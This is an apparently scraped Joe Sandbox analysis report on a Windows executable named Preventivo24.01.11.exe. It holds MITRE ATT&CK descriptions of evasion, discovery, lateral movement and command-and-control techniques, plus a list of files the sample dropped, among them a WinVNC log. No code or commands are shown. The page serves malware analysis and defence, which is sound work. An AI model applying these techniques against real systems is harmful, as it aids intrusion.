Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Preventivo24.01.11.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Games\IDD.txt

C:\Games\WinVNC.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\585b98c7-6e1b-42c6-9d18-1e6776e46b81.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7768

Windows Analysis Report
Preventivo24.01.11.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre